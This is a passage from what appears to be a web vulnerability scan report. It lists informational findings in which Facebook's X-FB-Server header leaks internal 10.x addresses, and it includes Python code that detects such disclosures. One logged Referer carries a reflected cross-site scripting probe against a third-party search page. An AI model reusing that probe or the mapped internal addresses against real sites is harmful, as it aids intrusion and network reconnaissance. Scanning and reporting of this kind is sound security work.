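    "Server: Test & Target\r\n"
    "\r\n"
    "/* if((location.href.indexOf('dev.sabre.com') != -1) ||\n"
    "   (location.href.indexOf('10.19.84.47') != -1)) { var hosttype='cert'; } */\n"
)

SAMPLE_CLEAN = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.17\r\n"
    "\r\n"
    "<!-- 2.0.1.68 build; public host 203.0.113.10 -->\n"
)

if __name__ == "__main__":
    for label, sample in (("header", SAMPLE_HEADER_LEAK),
                          ("body", SAMPLE_BODY_LEAK),
                          ("clean", SAMPLE_CLEAN)):
        print(label, find_private_ips(sample))
```

The severity stays at Information for a reason: a backend address such as 10.32.94.126 gives an attacker no path to that host by itself. It becomes useful only in combination with something that can reach the internal network, such as an SSRF or an open proxy, and when a whole fleet emits a header like X-FB-Server the collected values map its size and addressing plan. The fix on the server side is to strip diagnostic headers at the edge and to keep development hostnames and addresses out of shipped JavaScript, comments included, because a comment is still delivered to every client that fetches the file.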

23.77. http://www.facebook.com/dialog/oauth

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /dialog/oauth

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.27.94.127 (in the X-FB-Server header of the 302 redirect)

Request

GET /dialog/oauth?api_key=162729813767876&app_id=162729813767876&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c878248c%26origin%3Dhttp%253A%252F%252Fwww.tripadvisor.com%252Ff7888e4cc%26relation%3Dparent.parent%26transport%3Dpostmessage&client_id=162729813767876&display=none&locale=en_US&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd0b050c4%26origin%3Dhttp%253A%252F%252Fwww.tripadvisor.com%252Ff7888e4cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df375be5bb8&response_type=token%2Csigned_request%2Ccode&sdk=joey HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=3#cb=fd0b050c4&origin=http%3A%2F%2Fwww.tripadvisor.com%2Ff7888e4cc&relation=parent&transport=postmessage&frame=f375be5bb8&error=unknown_user
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.94.127
X-Cnection: close
Date: Mon, 03 Oct 2011 00:40:14 GMT
Content-Length: 0


23.78. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.54.177.62 (in the X-FB-Server response header)

Request

GET /extern/login_status.php?api_key=158327657537972&app_id=158327657537972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0e142%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1614ac084%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd74f8a6%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31b76cd44%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df222c04f5c%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.177.62
X-Cnection: close
Date: Mon, 03 Oct 2011 00:28:23 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

23.79. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.62.154.31 (in the X-FB-Server response header)

Request

GET /extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=2&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.154.31
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:36 GMT
Content-Length: 1159

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"hublotnation.com","channel"
...[SNIP]...

23.80. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.64.152.37 (in the X-FB-Server response header)

Request

GET /extern/login_status.php?api_key=141597515880090&app_id=141597515880090&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2328241ec%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32dd89434%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda51478c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df343debe4%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda51478c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ff5fda18%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda51478c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8aa22a24%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda51478c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.152.37
X-Cnection: close
Date: Mon, 03 Oct 2011 00:13:14 GMT
Content-Length: 242

<script type="text/javascript">
parent.postMessage("cb=f2ff5fda18&origin=http\u00253A\u00252F\u00252Fwww.expedia.com\u00252Ff34dd476e4&relation=parent&transport=postmessage&frame=fda51478c", "http:\/\
...[SNIP]...

23.81. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.64.68.43 (in the X-FB-Server response header)

Request

GET /extern/login_status.php?api_key=141597515880090&app_id=141597515880090&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21414a1d%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df87e1fe3%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b615ffc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df249f21b48%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b615ffc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d31961a%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b615ffc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18caaa6c%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b615ffc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.68.43
X-Cnection: close
Date: Mon, 03 Oct 2011 01:07:07 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f3d31961a&origin=http\u00253A\u00252F\u00252Fwww.expedia.com\u00252Ff2ef68ea8c&relation=parent&transport=postmessage&frame=f2b615ffc", "http:\/\/
...[SNIP]...

23.82. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.54.90.57 (in the X-FB-Server response header)

Request

GET /extern/login_status.php?api_key=5aaf37e32a30d8d582e69f8ddbfea86b&extern=0&channel=http%3A%2F%2Fwww.igougo.com%2Fxd_receiver.aspx&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.90.57
X-Cnection: close
Date: Mon, 03 Oct 2011 01:53:24 GMT
Content-Length: 1091

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"igougo.com","channel":"http
...[SNIP]...

23.83. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.54.136.46 (in the X-FB-Server response header)

Request

GET /extern/login_status.php?api_key=120836677942069&app_id=120836677942069&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c169940c%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df4f4b2a24%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df64f7cd6%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13ca67784%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18123d9d%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.136.46
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:48 GMT
Content-Length: 234

<script type="text/javascript">
parent.postMessage("cb=f13ca67784&origin=http\u00253A\u00252F\u00252Fwww.nike.com\u00252Ff20d909cc&relation=parent&transport=postmessage&frame=f89532eac", "http:\/\/www
...[SNIP]...

23.84. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.54.102.64 (in the X-FB-Server response header)

Request

GET /extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=0&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.64
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:21 GMT
Content-Length: 1092

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"hublotnation.com","channel"
...[SNIP]...
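Every finding in this group is the same pattern: the X-FB-Server response header carries a 10.x.x.x address, i.e. an internal host name leaking from behind the load balancer. The check below is an added example, not the scanner's own logic and not part of the original report. It pulls dotted quads out of headers and body, validates each one with the standard library (so a Chrome build number such as 14.0.835.187 is not reported) and keeps only addresses inside the three RFC 1918 ranges, which is narrower than Python's is_private. The sample response is constructed here, modelled on the headers shown above; the body text in it is invented to exercise the body path.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# RFC 1918 ranges only. ipaddress.is_private would also flag loopback,
# link-local and CGNAT space, which is not what this finding is about.
RFC1918_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# Candidate dotted quads, bounded so a longer dotted token is taken whole
# (and then rejected by ip_address) rather than partially matched.
DOTTED_QUAD = re.compile(r"(?<![\w.])(\d{1,3}(?:\.\d{1,3}){3})(?![\w.])")


def rfc1918_addresses(text: str) -> List[str]:
    """Return every RFC 1918 address in text, in order of first appearance."""
    found: List[str] = []
    for candidate in DOTTED_QUAD.findall(text):
        try:
            addr = ipaddress.ip_address(candidate)
        except ValueError:
            continue  # octet out of range, e.g. a version string like 14.0.835.187
        if any(addr in net for net in RFC1918_NETS) and candidate not in found:
            found.append(candidate)
    return found


def split_response(raw: str) -> Tuple[Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into a lower-cased header dict and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def find_disclosures(raw: str) -> List[Tuple[str, str]]:
    """Return (location, address) pairs for each RFC 1918 address in a response.

    Headers are reported before the body, which is where this report's
    X-FB-Server leaks would surface.
    """
    headers, body = split_response(raw)
    hits: List[Tuple[str, str]] = []
    for name, value in headers.items():
        for addr in rfc1918_addresses(value):
            hits.append((f"header {name}", addr))
    for addr in rfc1918_addresses(body):
        hits.append(("body", addr))
    return hits


# Constructed sample, modelled on finding 23.84 above. The body comment is
# invented: it contains a public address, a Chrome build number that looks
# like an address, and a second private address.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "X-FB-Server: 10.54.102.64\r\n"
    "X-Cnection: close\r\n"
    "Content-Length: 1092\r\n"
    "\r\n"
    '<script>document.domain = "facebook.com";</script>'
    "<!-- ua Chrome/14.0.835.187; resolver 8.8.8.8; backend 192.168.1.10 -->"
)

if __name__ == "__main__":
    for location, addr in find_disclosures(SAMPLE_RESPONSE):
        print(f"RFC 1918 address {addr} disclosed in {location}")
```

Run over a proxy log rather than a single response, the same function gives the per-host count of distinct internal addresses, which is the number that matters for triage: one leaked address is a server-naming nit, dozens of them map the backend pool.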

23.85. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.27.92.119

Request

GET /plugins/like.php?locale=en_US&href=http://www.agoda.com&layout=standard&show_faces=False&action=like&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.92.119
X-Cnection: close
Date: Mon, 03 Oct 2011 00:39:04 GMT
Content-Length: 25700

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.86. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.64.199.63

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Ftravelocity&send=false&layout=button_count&width=50&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.199.63
X-Cnection: close
Date: Mon, 03 Oct 2011 00:08:06 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.87. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.64.190.61

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2bbdf08e%26origin%3Dhttp%253A%252F%252Fwww.hotelplanner.com%252Ff33e26caf4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.facebook.com%2Fhotelplanner&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.190.61
X-Cnection: close
